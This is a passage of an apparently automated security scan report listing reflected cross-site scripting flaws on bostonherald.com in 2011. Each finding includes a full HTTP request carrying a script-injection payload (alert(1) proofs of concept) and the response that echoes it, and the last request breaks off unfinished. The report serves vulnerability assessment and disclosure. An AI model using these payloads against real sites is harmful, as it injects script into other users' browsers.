Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/2011/0170037\"><script>alert(1)</script>7feba13b723/27/van-halen-recording-with-celine-dion-producer/">
...[SNIP]...

2.3. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95c27"><script>alert(1)</script>81822d7f333 was submitted in the REST URL parameter 7. This input was echoed as 95c27\"><script>alert(1)</script>81822d7f333 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/2011/01/2795c27"><script>alert(1)</script>81822d7f333/van-halen-recording-with-celine-dion-producer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:10:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/2011/01/2795c27\"><script>alert(1)</script>81822d7f333/van-halen-recording-with-celine-dion-producer/">
...[SNIP]...

2.4. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3652"><script>alert(1)</script>947a9457054 was submitted in the REST URL parameter 8. This input was echoed as d3652\"><script>alert(1)</script>947a9457054 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producerd3652"><script>alert(1)</script>947a9457054/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:11:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producerd3652\"><script>alert(1)</script>947a9457054/">
...[SNIP]...

2.5. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19ef4"><script>alert(1)</script>1dd41ef465f was submitted in the REST URL parameter 5. This input was echoed as 19ef4\"><script>alert(1)</script>1dd41ef465f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/201119ef4"><script>alert(1)</script>1dd41ef465f/01/26/cutting-the-state-police/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:07:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:07:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/201119ef4\"><script>alert(1)</script>1dd41ef465f/01/26/cutting-the-state-police/">
...[SNIP]...

2.6. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13dab"><script>alert(1)</script>b404e1442a7 was submitted in the REST URL parameter 6. This input was echoed as 13dab\"><script>alert(1)</script>b404e1442a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/2011/0113dab"><script>alert(1)</script>b404e1442a7/26/cutting-the-state-police/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:08:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:08:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/2011/0113dab\"><script>alert(1)</script>b404e1442a7/26/cutting-the-state-police/">
...[SNIP]...

2.7. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3824"><script>alert(1)</script>ec4b7781a2e was submitted in the REST URL parameter 7. This input was echoed as a3824\"><script>alert(1)</script>ec4b7781a2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/2011/01/26a3824"><script>alert(1)</script>ec4b7781a2e/cutting-the-state-police/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:09:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:09:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/2011/01/26a3824\"><script>alert(1)</script>ec4b7781a2e/cutting-the-state-police/">
...[SNIP]...

2.8. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0bb1"><script>alert(1)</script>0c6338846da was submitted in the REST URL parameter 8. This input was echoed as d0bb1\"><script>alert(1)</script>0c6338846da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-policed0bb1"><script>alert(1)</script>0c6338846da/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:10:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-policed0bb1\"><script>alert(1)</script>0c6338846da/">
...[SNIP]...

2.9. http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59440"><script>alert(1)</script>a90735c589b was submitted in the REST URL parameter 5. This input was echoed as 59440\"><script>alert(1)</script>a90735c589b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/sports/rap_sheet/index.php/201159440"><script>alert(1)</script>a90735c589b/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:01:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/rap_sheet/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:01:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 57634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/sports/rap_sheet/index.php/201159440\"><script>alert(1)</script>a90735c589b/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/">
...[SNIP]...

2.10. http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ea2b"><script>alert(1)</script>c53f3083bf9 was submitted in the REST URL parameter 5. This input was echoed as 8ea2b\"><script>alert(1)</script>c53f3083bf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/sports/red_sox/index.php/20118ea2b"><script>alert(1)</script>c53f3083bf9/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:03:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/red_sox/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:03:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/sports/red_sox/index.php/20118ea2b\"><script>alert(1)</script>c53f3083bf9/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/">
...[SNIP]...

2.11. http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9bc2"><script>alert(1)</script>4c7b0ea2d57 was submitted in the REST URL parameter 6. This input was echoed as b9bc2\"><script>alert(1)</script>4c7b0ea2d57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/sports/red_sox/index.php/2011/01b9bc2"><script>alert(1)</script>4c7b0ea2d57/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:04:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/red_sox/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:03:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/sports/red_sox/index.php/2011/01b9bc2\"><script>alert(1)</script>4c7b0ea2d57/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/">
...[SNIP]...

2.12. http://www.bostonherald.com/includes/processAds.bg [companion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a67b1</script><script>alert(1)</script>4ab8f6765b0 was submitted in the companion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottoma67b1</script><script>alert(1)</script>4ab8f6765b0&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
